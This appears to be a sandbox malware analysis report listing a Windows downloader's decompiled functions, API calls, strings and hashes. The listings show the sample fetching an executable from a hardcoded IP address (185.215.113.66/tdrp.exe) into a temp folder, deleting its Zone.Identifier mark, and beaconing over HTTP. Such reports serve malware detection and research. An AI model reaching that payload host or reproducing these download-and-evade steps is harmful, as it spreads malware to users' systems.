                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                    • rand.MSVCRT ref: 0040F7B5
                                                                                                                                    • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                    • rand.MSVCRT ref: 0040F7CC
                                                                                                                                    • rand.MSVCRT ref: 0040F7E0
                                                                                                                                    • wsprintfW.USER32 ref: 0040F807
                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                    • wsprintfW.USER32 ref: 0040F844
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                    Strings
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F605
                                                                                                                                    • %s\%d%d.exe, xrefs: 0040F5E8
                                                                                                                                    • %s:Zone.Identifier, xrefs: 0040F6E8
                                                                                                                                    • %s\%d%d.exe, xrefs: 0040F7FB
                                                                                                                                    • %temp%, xrefs: 0040F58B
                                                                                                                                    • %s:Zone.Identifier, xrefs: 0040F838
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                    • API String ID: 1632876846-2803014298
                                                                                                                                    • Opcode ID: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
                                                                                                                                    • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                    • Opcode Fuzzy Hash: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
                                                                                                                                    • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69
                                                                                                                                    Function 004064A0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 111networkfileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                    • srand.MSVCRT ref: 004064B0
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                    • rand.MSVCRT ref: 004064D6
                                                                                                                                    • rand.MSVCRT ref: 004064EA
                                                                                                                                    • wsprintfW.USER32 ref: 0040650F
                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                    • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                    • wsprintfW.USER32 ref: 00406609
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                    Strings
                                                                                                                                    • %temp%, xrefs: 004064CB
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                    • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                    • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                    • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
                                                                                                                                    • API String ID: 2816847299-853099633
                                                                                                                                    • Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                    • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                    • Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                    • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28
                                                                                                                                    Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 556 40b850-40b867 call 40b780 559 40b869 556->559 560 40b86e-40b88a call 40b3d0 strcmp 556->560 561 40baf5-40baf8 559->561 564 40b891-40b8ad call 40b3d0 strstr 560->564 565 40b88c 560->565 568 40b8f0-40b90c call 40b3d0 strstr 564->568 569 40b8af-40b8cb call 40b3d0 strstr 564->569 565->561 576 40b90e-40b92a call 40b3d0 strstr 568->576 577 40b94f-40b96b call 40b3d0 strstr 568->577 574 40b8eb 569->574 575 40b8cd-40b8e9 call 40b3d0 strstr 569->575 574->561 575->568 575->574 586 40b94a 576->586 587 40b92c-40b948 call 40b3d0 strstr 576->587 584 40b96d-40b989 call 40b3d0 strstr 577->584 585 40b9ae-40b9c4 EnterCriticalSection 577->585 596 40b9a9 584->596 597 40b98b-40b9a7 call 40b3d0 strstr 584->597 589 40b9cf-40b9d8 585->589 586->561 587->577 587->586 592 40ba09-40ba14 call 40bb00 589->592 593 40b9da-40b9ea 589->593 605 40baea-40baef LeaveCriticalSection 592->605 606 40ba1a-40ba28 592->606 598 40ba07 593->598 599 40b9ec-40ba05 call 40df20 593->599 596->561 597->585 597->596 598->589 599->592 605->561 608 40ba2a 606->608 609 40ba2e-40ba3f call 40a740 606->609 608->609 609->605 612 40ba45-40ba62 call 40df20 609->612 615 40ba64-40ba74 612->615 616 40baba-40bad2 612->616 618 40ba80-40bab8 call 40ab60 615->618 619 40ba76-40ba7e Sleep 615->619 617 40bad8-40bae3 call 40bb00 616->617 617->605 624 40bae5 call 40b530 617->624 618->617 619->615 624->605
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                      • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                    • strcmp.NTDLL ref: 0040B880
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                                    • Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                    • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                    • Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                    • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE
                                                                                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 626 401920-401947 GetTickCount WaitForSingleObject 627 401ac9-401acf 626->627 628 40194d-401964 WSAWaitForMultipleEvents 626->628 629 4019f0-401a03 GetTickCount 628->629 630 40196a-401981 WSAEnumNetworkEvents 628->630 632 401a43-401a4c GetTickCount 629->632 633 401a05-401a14 EnterCriticalSection 629->633 630->629 631 401983-401988 630->631 631->629 636 40198a-401990 631->636 637 401ab5-401ac3 WaitForSingleObject 632->637 638 401a4e-401a5d EnterCriticalSection 632->638 634 401a16-401a1d 633->634 635 401a3a-401a41 LeaveCriticalSection 633->635 639 401a35 call 401820 634->639 640 401a1f-401a27 634->640 635->637 636->629 641 401992-4019b1 accept 636->641 637->627 637->628 642 401aa1-401ab1 LeaveCriticalSection GetTickCount 638->642 643 401a5f-401a77 InterlockedExchangeAdd call 40df20 638->643 639->635 640->634 644 401a29-401a30 LeaveCriticalSection 640->644 641->629 646 4019b3-4019c2 call 4022c0 641->646 642->637 651 401a97-401a9f 643->651 652 401a79-401a82 643->652 644->637 646->629 653 4019c4-4019df call 401740 646->653 651->642 651->643 652->651 654 401a84-401a8d call 40b4f0 652->654 653->629 659 4019e1-4019e7 653->659 654->651 659->629 660 4019e9-4019eb call 401cf0 659->660 660->629
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                    • Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                    • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                    • Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                    • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99
                                                                                                                                    Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040EF98
                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                    • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                    • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                    • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                    • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                    • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54
                                                                                                                                    Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                                    • Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                    • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                    • Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                    • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98
                                                                                                                                    Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 004058D8
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                    • wsprintfW.USER32 ref: 00405926
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                    • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                    • String ID: %x%X$0
                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                    • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                    • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69
                                                                                                                                    Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040E668
                                                                                                                                    • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                    • String ID: <$GET
                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                    • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                    • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                    • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                    • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
                                                                                                                                    Function 0040F240 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                    • memcmp.NTDLL ref: 0040F35D
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902698870-0
                                                                                                                                    • Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                    • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                    • Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                    • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
                                                                                                                                    Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
